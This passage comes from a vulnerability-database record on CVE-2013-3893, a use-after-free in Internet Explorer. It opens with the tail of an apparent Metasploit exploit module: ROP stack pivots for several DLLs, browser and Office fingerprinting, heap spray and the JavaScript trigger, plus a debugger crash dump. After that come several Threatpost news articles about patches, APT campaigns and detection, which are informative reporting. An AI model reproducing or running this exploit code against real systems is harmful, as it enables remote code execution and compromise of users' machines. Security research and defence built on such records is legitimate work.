},\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Privileged' => false,\r\n # Jsunpack first received a sample to analyze on Sep 12 2013.\r\n # MSFT patched this on Oct 8th.\r\n 'DisclosureDate' => "Oct 08 2013",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def get_check_html\r\n %Q|<html>\r\n<script>\r\n#{js_os_detect}\r\n\r\nfunction os() {\r\n var detect = window.os_detect.getVersion();\r\n var os_string = detect.os_name + " " + detect.os_flavor + " " + detect.ua_name + " " + detect.ua_version;\r\n return os_string;\r\n}\r\n\r\nfunction dll() {\r\n var checka = 0;\r\n var checkb = 0;\r\n try {\r\n checka = new ActiveXObject("SharePoint.OpenDocuments.4");\r\n } catch (e) {}\r\n\r\n try {\r\n checkb = new ActiveXObject("SharePoint.OpenDocuments.3");\r\n } catch (e) {}\r\n\r\n if ((typeof checka) == "object" && (typeof checkb) == "object") {\r\n try{location.href='ms-help://'} catch(e){}\r\n return "#{@js_office_2010_str}";\r\n }\r\n else if ((typeof checka) == "number" && (typeof checkb) == "object") {\r\n try{location.href='ms-help://'} catch(e){}\r\n return "#{@js_office_2007_str}";\r\n }\r\n return "#{@js_default_str}";\r\n}\r\n\r\nwindow.onload = function() {\r\n window.location = "#{get_resource}/search?o=" + escape(os()) + "&d=" + dll();\r\n}\r\n</script>\r\n</html>\r\n |\r\n end\r\n\r\n def junk\r\n rand_text_alpha(4).unpack("V")[0].to_i\r\n end\r\n\r\n def get_payload(target_info)\r\n rop_payload = ''\r\n os = target_info[:os]\r\n dll_used = ''\r\n\r\n case target_info[:dll]\r\n when @js_office_2007_str\r\n dll_used = "Office 2007"\r\n\r\n pivot =\r\n [\r\n 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4\r\n junk, # ESI due to POPAD\r\n junk, # EBP due to POPAD\r\n junk,\r\n junk, # EBX due to POPAD\r\n junk, # EDX due to POPAD\r\n junk, # ECX due to POPAD\r\n 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)\r\n 0x51bd81db, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack("V*")\r\n\r\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})\r\n\r\n when @js_office_2010_str\r\n dll_used = "Office 2010"\r\n\r\n pivot =\r\n [\r\n 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n junk,\r\n 0x51BE7E9A, # ROP NOP\r\n junk # Padding for the retn 4 from the stack pivot\r\n ].pack("V*")\r\n\r\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})\r\n\r\n when @js_default_str\r\n if target_info[:os] =~ /windows xp/i\r\n # XP uses msvcrt.dll\r\n dll_used = "msvcrt"\r\n\r\n pivot =\r\n [\r\n 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret\r\n ].pack("V*")\r\n\r\n rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})\r\n else\r\n # Assuming this is Win 7, and we'll use Java 6 ROP\r\n dll_used = "Java"\r\n\r\n pivot =\r\n [\r\n 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn\r\n junk # Padding for the POP ECX\r\n ].pack("V*")\r\n\r\n rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})\r\n end\r\n end\r\n\r\n print_status("Target uses #{os} with #{dll_used} DLL")\r\n\r\n rop_payload\r\n end\r\n\r\n def get_sploit_html(target_info)\r\n os = target_info[:os]\r\n js_payload = ''\r\n\r\n if os =~ /Windows (7|XP) MSIE 8\\.0/\r\n js_payload = Rex::Text.to_unescape(get_payload(target_info))\r\n else\r\n print_error("Target not supported by this attack.")\r\n return ""\r\n end\r\n\r\n %Q|<html>\r\n<head>\r\n<script>\r\n#{js_property_spray}\r\nsprayHeap({shellcode:unescape("#{js_payload}")});\r\n\r\nvar earth = document;\r\nvar data = "";\r\nfor (i=0; i<17; i++) {\r\n if (i==7) { data += unescape("%u2020%u2030"); }\r\n else { data += "\\\\u4141\\\\u4141"; }\r\n}\r\ndata += "\\\\u4141";\r\n\r\nfunction butterfly() {\r\n for(i=0; i<20; i++) {\r\n var effect = earth.createElement("div");\r\n effect.className = data;\r\n }\r\n}\r\n\r\nfunction kaiju() {\r\n var godzilla = earth.createElement("textarea");\r\n var minilla = earth.createElement("pre");\r\n earth.body.appendChild(godzilla);\r\n earth.body.appendChild(minilla);\r\n godzilla.appendChild(minilla);\r\n\r\n godzilla.onselect=function(e) {\r\n minilla.swapNode(earth.createElement("div"));\r\n }\r\n\r\n var battleStation = false;\r\n var war = new Array();\r\n godzilla.onpropertychange=function(e) {\r\n if (battleStation == true) {\r\n for (i=0; i<50; i++) {\r\n war.push(earth.createElement("span"));\r\n }\r\n }\r\n\r\n earth.execCommand("Unselect");\r\n\r\n if (battleStation == true) {\r\n for (i=0; i < war.length; i++) {\r\n war[i].className = data;\r\n }\r\n }\r\n else {\r\n battleStation = true;\r\n }\r\n }\r\n\r\n butterfly();\r\n godzilla.select();\r\n}\r\n</script>\r\n</head>\r\n<body onload='kaiju()'>\r\n</body>\r\n</html>\r\n |\r\n end\r\n\r\n\r\n def on_request_uri(cli, request)\r\n if request.uri =~ /search\\?o=(.+)\\&d=(.+)$/\r\n target_info = { :os => Rex::Text.uri_decode($1), :dll => Rex::Text.uri_decode($2) }\r\n sploit = get_sploit_html(target_info)\r\n send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n return\r\n end\r\n\r\n html = get_check_html\r\n print_status("Checking out target...")\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\r\n end\r\n\r\n def exploit\r\n @js_office_2007_str = Rex::Text.rand_text_alpha(4)\r\n @js_office_2010_str = Rex::Text.rand_text_alpha(5)\r\n @js_default_str = Rex::Text.rand_text_alpha(6)\r\n super\r\n end\r\n\r\nend\r\n\r\n\r\n=begin\r\n\r\n+hpa this for debugging or you might not see a crash at all :-)\r\n\r\n0:005> r\r\neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c\r\neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????\r\n0:005> u\r\nmshtml!QIClassID+0x30:\r\n6d6dc123 8b03 mov eax,dword ptr [ebx]\r\n6d6dc125 8365e800 and dword ptr [ebp-18h],0\r\n6d6dc129 8d4de8 lea ecx,[ebp-18h]\r\n6d6dc12c 51 push ecx\r\n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)\r\n6d6dc132 53 push ebx\r\n6d6dc133 bf02400080 mov edi,80004002h\r\n6d6dc138 ff10 call dword ptr [eax]\r\n\r\n=end\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82516"}], "threatpost": [{"lastseen": "2018-10-06T23:00:00", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893", "CVE-2013-3897", "CVE-2017-11882"], "description": "As expected, Microsoft began shipping its latest batch of Patch Tuesday patches earlier this afternoon. However, while it was heavily presumed the update would fix at least one Internet Explorer zero day, the update actually fixes two critical vulnerabilities in the browser.\n\nEight bulletins \u2014 four critical \u2014 and 28 vulnerabilities in total are addressed by the [update](<http://technet.microsoft.com/en-us/security/bulletin/ms13-oct>), the 10th anniversary release of the company\u2019s popular flaw remediation program.\n\nNaturally, at the top of the list is [MS13-080](<https://technet.microsoft.com/en-us/security/bulletin/ms13-080>) which addresses the much-buzzed about use-after-free bug (CVE-2013-3893) on the Microsoft HTML rendering engine in IE. The zero day targeted all builds of IE over the course of the last month or so and this patch, which also loops in nine other IE fixes, builds off of a FixIt tool Microsoft released for the issue [in mid-September](<http://threatpost.com/microsoft-warns-of-new-ie-zero-day/102327>).\n\nThe vulnerability gained notoriety in the last few weeks following the creation of a [Metasploit module](<http://threatpost.com/metasploit-module-released-for-ie-zero-day/102471>) and the emergence of [several campaigns targeting Asia](<http://threatpost.com/three-new-attacks-using-ie-zero-day-exploit/102476>) that used the exploit as an attack vector.\n\nAmong those nine IE vulnerabilities, CVE-2013-3897, is also getting the attention of researchers today. The issue, a memory corruption vulnerability that\u2019s been spotted in targeted exploitation, was discovered in part by the National Cyber Security Centre of the Netherlands according to Microsoft.\n\nTrustwave\u2019s SpiderLabs posted a [brief synopsis](<http://blog.spiderlabs.com/2013/10/another-day-another-ie-zero-day.html>) of the vulnerability today and claims the zero day has been in the wild for more than a month and campaigns initially targeted Japanese and Korean users.\n\nAccording to Wolfgang Kandek, the CTO of cloud security firm Qualys, the vulnerability was still shoehorned into Internet Explorer\u2019s cumulative security update, despite only recently being discovered.\n\n\u201cIn the last two weeks, attacks against the same vulnerability became public, again limited and targeted in scope, but since the fix was in the code already, it enabled Microsoft to address the vulnerability\u2026 in record time,\u201d Kandek said Tuesday.\n\nMuch like the user-after-free bug issue, attacks against CVE-2013-3897 were spotted in the wild but weren\u2019t widespread enough to force Microsoft to issue an out-of-band patch before this week\u2019s update.\n\nThe rest of the month\u2019s updates address remote code execution issues in Windows, Office, .NET, Server, SharePoint and an information disclosure issue in Silverlight.\n\nWhile they\u2019re not known to be actively exploited, three of those issues are marked critical, including vulnerabilities in both Windows\u2019 kernel mode driver (MS13-081) and .NET Framework (MS13-082) that stem from problems with embedded OpenType fonts.\n\nThe last critical issue involves a remote, server-side vulnerability in ASP.NET that could let attackers send a specially crafted web request to an ASP.NET web app running on an affected system and in turn, run arbitrary code.\n\nRapid 7\u2019s Ross Barrett, senior manager of security engineering, called the vulnerability a \u201creal, honest to goodness, potentially \u201cwormable\u201d condition\u201d Tuesday, warning it could spread rapidly.\n\n\u201cIf the \u201cbad guys\u201d figure out a way to automate the exploitation of this, it could spread rapidly and the defense in depth measures of your organization will be tested,\u201d Barrett said.\n\nThe rest of the patches address relatively minor issues \u2013 at least in comparison to the IE vulnerabilities \u2013 in Sharepoint, Microsoft Word, Excel and the company\u2019s application framework, Silverlight.\n\nPer usual the updates will be deployed on most users\u2019 machines automatically over the next day or so. Those who don\u2019t have automatic updates enabled will want to check for updates and install the updates, especially those who run any version of Internet Explorer, manually.\n", "modified": "2013-10-15T16:26:51", "published": "2013-10-08T16:13:09", "id": "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "href": "https://threatpost.com/october-patch-tuesday-fixes-critical-ie-bugs-28-vulnerabilities/102549/", "type": "threatpost", "title": "October Patch Tuesday Fixes Critical IE Bugs, 28 Vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:52", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893"], "description": "The so-called [Deputy Dog APT group](<https://threatpost.com/compromised-japanese-media-sites-serving-exploits-for-latest-ie-zero-day/102384>) has surfaced again with a means of keeping its command and control servers under wraps that involves Microsoft\u2019s TechNet online resources.\n\nNew [research](<https://www.fireeye.com/blog/threat-research/2015/05/hiding_in_plain_sigh.html>) published last week by Microsoft and FireEye revealed targeted attacks against organizations have been discovered in which Chinese attackers have created phony profiles on the Microsoft-owned IT resource where the attackers are embedding encoded command and control information used by a variant of the BlackCoffee remote access Trojan.\n\nThe use of TechNet is a formidable evasion technique since most signature-based defenses wouldn\u2019t consider such a widely used resource a threat.\n\nIn conjunction with the discovery, researchers at RSA Security today released to the public a Python script that [decodes the embedded values](<https://blogs.rsa.com/wolves-among-us-abusing-trusted-providers-malware-operations/>) on a TechNet page and reveals command and control information.\n\nRSA researchers Brian Baskin and Jared Myers said the malware, which they call PNGRAT, was found on two customer networks. They explain that the malware contains a hardcoded URL to the attacker-created TechNet profile page. The malicious code connects to TechNet, decodes the message buried in a string between the characters @MICRO0S0FT and C0RP0RATI0N. Doing so reveals an IP address where further command and control connections await, RSA said.\n\n\u201cIt\u2019s not an overly complicated encoding scheme; looking at the malware, it took us about 15 minutes to figure out the encoding,\u201d Myers said. \u201cIt uses two characters for every octet of the IP address. It does simple math on each character, adds it up and it ends up resolving the value, which is one octet of the IP address.\u201d\n\nThe PNGRAT variant, RSA said, contains a bit of additional functionality, including some features generally confined to crimeware rather than malware used in targeted attacks. The use of TechNet to store command and control information is a time-tested tactic from attackers as they continue to focus on evading detection and keep C&C servers up and running for longer periods of time.\n\n\u201cThat\u2019s the problem with this aspect of the attack; TechNet is popular and would not be blocked,\u201d Baskin said. \u201cWe\u2019ve seen that same style of attack used before with Gmail and other public websites. Tomorrow, or the week after, or the month after, they could be using this same routine on an Amazon page or any other trusted website out there.\u201d\n\nFireEye\u2019s attributes the attack to [DeputyDog,](<https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html>) which is also known as APT17, which has used the BlackCoffee malware for two years. Its targets in the past have included government agencies, international law enforcement firms and technology companies. DeputyDog hit media targets in Japan in late 2013 with a rash of malware exploiting a zero-day vulnerability in Internet Explorer. Exploits were disguised as image files and once they were executed, connected to command and control servers and sent stolen data back to the attackers.\n\nRSA refused to provide any details on the two compromised organizations it investigated.\n\n\u201cI would say [the attackers\u2019] mission somewhat successful,\u201d Baskin said. \u201cThey were not in the environment as long as they wanted to be, but they were able to get data out.\u201d\n", "modified": "2015-05-26T12:00:03", "published": "2015-05-18T15:03:16", "id": "THREATPOST:1699EFD514DA7A82DC9285D3892F61AE", "href": "https://threatpost.com/apt-group-embeds-command-and-control-data-on-technet-pages/112881/", "type": "threatpost", "title": "APT Group Embeds C&C Data on TechNet Pages", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "bulletinFamily": "info", "cvelist": ["CVE-2013-3892", "CVE-2013-3893"], "description": "Attackers are continuing to pile on a critical Internet Explorer zero day that remains unpatched two weeks after it was reported.\n\nDuring the last two weeks, it appears that at least three separate targeted attack campaigns have been using the same bug previously used by Operation Deputy Dog, a campaign that wound up compromising Japanese media outlets and tech systems in the middle of September.\n\nResearchers at FireEye [initially discovered the DeputyDog campaign](<http://threatpost.com/compromised-japanese-media-sites-serving-exploits-for-latest-ie-zero-day/102384>) \u2013 which leveraged the CVE-2013-3893 vulnerability \u2013 a little over a week ago. Now word comes that three other, unconnected campaigns, Taidoor, th3bug and Web2Crew are also using the same exploit.\n\nWeb2Crew was spotted on September 25 using the Internet Explorer vulnerability to drop the remote access Trojan PoisonIvy onto machines \u2013 some belonging to a financial institution. While the exploit was hosted on a server in Taiwan, an IP address from Hong Kong was used to host its command and control server, an IP address that FireEye associated with Web2Crew during the month of August.\n\nThanks to the CVE-2013-3892 vulnerability, Taidoor, a type of malware that was seen compromising victims in Taiwan over the summer surfaced on a Taiwanese government website on Sept. 26.\n\nLastly, FireEye also noticed a campaign by malicious actor th3bug using the vulnerability on Sept. 27. That campaign, much like Web2Crew, unleashed a PoisonIvy payload to those who visited any websites it compromised.\n\nFireEye\u2019s Ned Moran and Nart Villeneuve, who [wrote a blog entry about the new campaigns yesterday](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/hand-me-downs-exploit-and-infrastructure-reuse-among-apt-campaigns.html>) note that this is a usual occurrence.\n\n\u201cIt is not uncommon for APT groups to hand off exploits to others, who are lower on the zero-day food chain \u2013 especially after the exploit becomes publicly available,\u201d the two wrote.\n\nWhile the exploit isn\u2019t publicly available per se, it certainly has become more widespread throughout the cybercrime underground as of late. On Monday [Metasploit released](<http://threatpost.com/metasploit-module-released-for-ie-zero-day/102471>) an exploit module for the vulnerability, something that will almost assuredly ramp up attacks using the bug.\n\nWhile Microsoft released a FixIt tool for the bug in September and urged older IE users to download and apply it, some thought the company might still issue an out of band patch to fix the flaw. At this point, with the company\u2019s usual Patch Tuesday release scheduled for next Tuesday, it seems that users will remain vulnerable for at least another week.\n", "modified": "2013-10-01T19:45:17", "published": "2013-10-01T15:45:17", "id": "THREATPOST:174CD32833BE921F59C5BEFC8DB73DBC", "href": "https://threatpost.com/three-new-attacks-using-ie-zero-day-exploit/102476/", "type": "threatpost", "title": "Three New APTs Spotted Piling On IE Zero Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:22", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893", "CVE-2017-11882"], "description": "Windows Error Reporting, also known as Dr. Watson reports, [are Windows crash reports sent by default unencrypted to Microsoft](<http://threatpost.com/unencrypted-windows-error-crash-reports-a-treasure-for-nsa-hackers-alike/103363>), which uses them to fix bugs. The reports are rich with system data that Microsoft also uses to enhance user interaction with its products. Since, however, they are sent in clear text back to Redmond, they are also at risk for interception by hackers who can use the system data to blueprint potential vulnerabilities in order to ultimately exploit them.\n\nWhile it may sound far-fetched, a German publication reported in late December that the U.S. National Security Agency was doing just that\u2014using its [XKeyscore tool to collect crash reports](<http://www.spiegel.de/international/world/the-nsa-uses-powerful-toolbox-in-effort-to-spy-on-global-networks-a-940969.html>) and target exploits accordingly.\n\nThe only mitigation is that Windows administrators must manually opt-out of sending crash reports back to Microsoft, something that isn\u2019t happening on a large scale; Microsoft receives billions of these reports from 80 percent of its installed user base.\n\nSecurity company Websense, in December, urged administrators to be proactive about these reports and use them as a first step in detecting advanced attacks against an organization since exploits generally cause applications to behave abnormally. The company released a [report](<http://www.websense.com/content/websense-crash-apt-report.aspx>) today that demonstrates exactly how to do that and said it was able to find advanced attacks in progress against a major cellular network operator and a Turkish government website. It also threw back the covers on another campaign targeting point-of-sale systems with a variant of the Zeus Trojan built to infect POS devices and backends.\n\nThe key is to differentiate between crashes that are indicative of exploits and those that are merely crashes due to a programming bug. For example, crashes that happen outside of programmable memory space could be an indication of an active exploit that enables remote code execution.\n\n\u201cIt goes from a breadcrumb to something interesting,\u201d said Alex Watson, director of security research at Websense.\n\nWatson said his company collected 16 million Dr. Watson reports during a four-month period, looking for system crashes caused by previously unseen exploits against CVE-2013-3893, a use-after-free vulnerability in Internet Explorer 6-11 that was used in the [Deputy Dog watering hole attacks](<http://threatpost.com/compromised-japanese-media-sites-serving-exploits-for-latest-ie-zero-day/102384>) against a number of companies in high-profile industries in Asia. Those failed processes leading to system crashes enabled Websense to fingerprint the damage caused by an exploit attempt.\n\nOf the 16 million reports, five crash reports in four organizations matched the fingerprint Websense built that included memory locations where IE might crash if it were attacked using a CVE-2013-3893 exploit. As it turned out, both organizations were hit by the HWorm remote access Trojan used in targeted attacks. The RAT beaconed from both organizations at the same time as the failed exploit happened, Watson said.\n\n\u201cWe were able to link the failed exploit attempt to the RAT to get some indicator of common techniques,\u201d Watson said.\n\nWebsense said it also collected crash data from point-of-sale applications similar to those compromised in the Target and Neiman Marcus breaches by [RAM scraper malware](<http://threatpost.com/ram-scraper-malware-a-threat-to-point-of-sale-systems/103623>) which steals credentials and payment card data from the device before it is encrypted and sent to the payment processor. A majority of the crash reports Websense used were from a clothing retailer in the Eastern United States, it said, which was infected with a [variant of Zeus that zeroes in on POS devices and applications](<https://blog.kaspersky.com/ram-scrapers-and-other-point-of-sale-malware/>). Watson said the malware attempted to connect to command and control servers at the same time the applications crashed.\n\n\u201cMost exploits today force applications to behave in a way they\u2019re not supposed to and they end up executing shell code and things like that,\u201d Watson said. \u201cWith Microsoft rolling out advanced stuff like ASLR making it really hard for attackers to successfully execute exploits, there\u2019s a much higher chance they\u2019re going to fail. Once attackers gain a foothold in the network and make it past the perimeter-based security system, there\u2019s a mindset that their content is no longer monitored by IPS systems and you\u2019ll see attackers use the most direct path with exploits toward their target, thinking they\u2019re not going to be monitored. Again, there\u2019s a high chance of crashing applications on the network.\u201d\n", "modified": "2014-02-19T17:53:01", "published": "2014-02-19T12:53:01", "id": "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "href": "https://threatpost.com/windows-crash-reports-used-to-find-zero-day-attacks/104349/", "type": "threatpost", "title": "Windows Error Reporting Used to Find Advanced Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:06", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893", "CVE-2017-11882"], "description": "Attackers exploiting a [zero-day vulnerability in Microsoft\u2019s Internet Explorer browser](<http://threatpost.com/microsoft-warns-of-new-ie-zero-day/102327>) have compromised several popular local Japanese media outlets and have infected systems belonging to government, high tech and manufacturing organizations in Japan.\n\nResearchers at FireEye said the attacks appear to be a large-scale intelligence gathering operation and are dropping a knock-off of the [McRAT remote access malware](<http://threatpost.com/oracle-rushes-emergency-java-update-patch-mcrat-vulnerabilities-030413/77584>) to exfiltrate data from compromised computers. It is unclear whether the sites used in the watering hole attack have been cleaned up, said Darien Kindlund, manager of threat intelligence at FireEye, who said his company has been in contact with CERTs in Japan about the issue.\n\nThe news of the attacks coupled with the severity of the IE zero day prompted the SANS Internet Storm Center to raise its threat level over the weekend. In the meantime, IE users are still being urged to install a FixIt tool as a temporary mitigation for the vulnerability until a patch is released. Experts believe Microsoft will issue an out-of-band patch before its next Patch Tuesday release on Oct. 8. Microsoft would not comment on a timeline in fielding a request from Threatpost. Meanwhile, Metasploit engineers continue to work on an exploit module for this vulnerability, but to date, one is not yet available, a company spokesperson said.\n\nThe targeted attacks on Japanese organizations were reported by Qualys a week ago when [Microsoft issued an advisory](<http://technet.microsoft.com/en-us/security/advisory/2887505>) that an unpatched IE bug affecting all versions back to IE 6 was being exploited; Microsoft released a [FixIt tool](<http://support.microsoft.com/kb/2887505>) and urged IE users to install that as a mitigation until a patch was ready.\n\nMicrosoft\u2019s Neil Sikka wrote in the advisory that a sample its engineers had seen worked on Windows XP and Windows 7, attacking a [Use After Free vulnerability in the browser\u2019s mshtml.dll HTML rendering engine](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3893>) and that Javascript exploit was able to bypass ASLR. ASLR, or Address Space Layout Randomization, is a security feature available in Windows that helps secure products against buffer overflow attacks.\n\n\u201cThis is as severe as any browser issue can be,\u201d Rapid7 senior manager of security engineering Ross Barrett said. Kindlund agreed, adding that the vulnerability in question is the perfect fodder for a watering hole attack.\n\nUnlike previous watering hole attacks such as those spotted earlier this year against the Council of Foreign Relations website, the javascript used to exploit a website will attempt to learn what it can about the endpoint it\u2019s infecting, information such as operating system or browser version, Kindlund said.\n\n\u201cWhy did it do that? Because the exploit it was serving up could be specific to the particular flavor of IE or patch level of the operating system,\u201d he said. \u201cIn this case, because the exploit covers so many versions of IE, the attackers don\u2019t need to set up precursor logic like that in the javascript. They can deliver the same exploit (over and over) and be confident it will work.\u201d\n\nKindlund also notes that the attacks, which date back to Aug. 19, also coincide with major holidays and festivals in that part of the world; for example, today is Autumnal Equinox Day in Japan, a national holiday akin to Memorial Day in the U.S. Also, the China Moon Festival, a popular harvest festival, took place last week, meaning that fewer companies would be online and able to mitigate any issues.\n\nFireEye named the attack [Deputy Dog](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html>) after a string found in the attack code. FireEye also said that it saw a [payload executable file](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-part-2-zero-day-exploit-analysis-cve-2013-3893.html>) used against a Japanese target posing as an image file hosted on a Hong Kong server. Once it infects a host computer, it connects to a command and control server in South Korea over port 443; the callback traffic is unencrypted, despite its use of port 443, FireEye said, adding that a second sample it collected also connected to the same South Korean IP address.\n\nFireEye said it also discovered a handful of malicious domains also pointing to the IP in South Korea, which allowed them to make the connection to an attack against security company Bit9 this year. The same email address that registered the South Korean server also registered a domain used in the attack on the security company.\n\n\u201cThe [exploit depends on a Microsoft Office DLL](<https://community.qualys.com/blogs/laws-of-vulnerabilities/2013/09/17/september-2013--new-ie-0-day>) which has been compiled without Address Space Layout Randomization to locate the right memory segment to attack, but this DLL is extremely common and most likely will not lower the affected population by much,\u201d said Qualys CTO Wolfgang Kandek. \u201cWhile the attack is very targeted and geographically limited to Japan, it might not affect you at the moment. But with the publication of the shim, other attackers can now analyze the condition fixed and will be able to produce an equivalent exploit fairly quickly.\u201d\n", "modified": "2013-10-01T14:57:55", "published": "2013-09-23T13:57:33", "id": "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "href": "https://threatpost.com/compromised-japanese-media-sites-serving-exploits-for-latest-ie-zero-day/102384/", "type": "threatpost", "title": "IE Zero Day Used in Targeted Attacks Against Japanese Firms", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:03", "bulletinFamily": "info", "cvelist": ["CVE-2013-3893", "CVE-2017-11882"], "description": "It\u2019s been 14 days since Microsoft issued an advisory and temporary mitigation for a [zero-day vulnerability in Internet Explorer](<http://threatpost.com/microsoft-warns-of-new-ie-zero-day/102327>), one being actively exploited in the wild and called by some experts as severe a browser bug as you can have.\n\nYet users have since had little more to shield them from these active attacks than a [Fix It tool](<http://support.microsoft.com/kb/2887505>) released by Microsoft on Sept. 17. In the meantime, exploits have already taken down a number of [Japanese media sites in a watering hole attack](<http://threatpost.com/compromised-japanese-media-sites-serving-exploits-for-latest-ie-zero-day/102384>) targeting government agencies and manufacturers in Japan, and have been implicated in other attacks in Asia going back further than first thought. Microsoft has yet to issue an out-of-band patch for the bug, and with Patch Tuesday a week away, it\u2019s increasingly likely users will continue to be exposed for at least another seven days.\n\nThat approach has worked to date because known attacks have been relatively targeted and on a small scale. Yesterday, however, things may have been accelerated with the release of a Metasploit exploit module for [CVE-2013-3893](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3893>). If you\u2019re a believer in [HD Moore\u2019s Law](<http://blog.cognitivedissidents.com/2011/11/01/intro-to-hdmoores-law/>), a theory proposed by Josh Corman of Akamai that mirrors Moore\u2019s Law of computing in that casual attacker power grows at the rate of Metasploit, then one could expect an uptick in attacks using this IE bug.\n\nMicrosoft did not respond to a request for comment, but last week in response to the attacks against the Japanese media sites, Microsoft said it was continuing to work on developing and testing a security update and urged customers to install the Fix It.\n\nMetasploit engineer Wei Chen wrote in a [blogpost](<https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free>) that while the exploit currently being seen in the wild targets IE 8 on Windows XP and IE 9 on Windows 7, the vulnerability is found in IE all the way back to IE 6 and the Metasploit module could be tweaked for a broader swath of targets.\n\nMicrosoft wrote in its [advisory](<http://support.microsoft.com/kb/2887505>) that the remote execution vulnerability is a use-after-free bug in the Microsoft HTML rendering engine in IE, and the exploit in the wild is done in javascript. It was also dependent on a Microsoft Office DLL that was not compiled with Address Space Layout Randomization (ASLR) enabled. The exploit, therefore, bypasses the ASLR memory protection by providing executable code at a known address in memory, Microsoft said. An attacker could use a hardcoded Return Oriented Programming chain to mark the pages containing shell code as executable.\n\nAttackers could infect victims by luring them to a website hosting the malicious javascript exploit, or spike an online ad with the exploit.\n\nAccording to Chen, the IE8 on XP version of the exploit targets only English, Chinese, Japanese and Korean users, unlike the Windows 7 targets.\n\n\u201cInstead, the exploit would try against any Windows 7 machines (IE8/IE9) as long as Office 2007 or Office 2010 is installed,\u201d he said. \u201cThis is because the Microsoft Office Help Data Services Module (hxds.dll) can be loaded in IE, and is required to leverage Return-Oriented Programming in order to bypass DEP and ASLR, and gain arbitrary code execution.\u201d\n\nA number of popular Japanese media sites were compromised and were hosting the javascript exploit. IE users visiting those sites were redirected to sites hosting a version of the McRAT remote access malware, researchers at FireEye said on Sept. 23. The malware is used to exfiltrate data from a victim\u2019s computer, and reports were that government officials and workers in high tech and manufacturing organizations had been infected.\n\nFireEye\u2019s Darien Kindlund told Threatpost that the javascript exploit will first determine system and browser details before serving up the correct exploit. \u201cIn this case, because the exploit covers so many versions of IE, the attackers don\u2019t need to set up precursor logic like that in the javascript. They can deliver the same exploit (over and over) and be confident it will work,\u201d he said.\n\nFireEye said infected computers connect to a command and control server in South Korea over port 443; the callback traffic is unencrypted, despite its use of port 443, FireEye said, adding that a second sample it collected also connected to the same South Korean IP address. FireEye said it also discovered a handful of malicious domains also pointing to the IP in South Korea, which allowed them to make the connection to an attack against security company Bit9 this year. The same email address that registered the South Korean server also registered a domain used in the attack on the security company.\n", "modified": "2013-10-03T17:59:56", "published": "2013-10-01T13:47:22", "id": "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "href": "https://threatpost.com/metasploit-module-released-for-ie-zero-day/102471/", "type": "threatpost", "title": "Metasploit Exploit Module for IE Zero-Day Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2020-11-15T18:37:58", "bulletinFamily": "info", "cvelist": ["CVE-2012-4969", 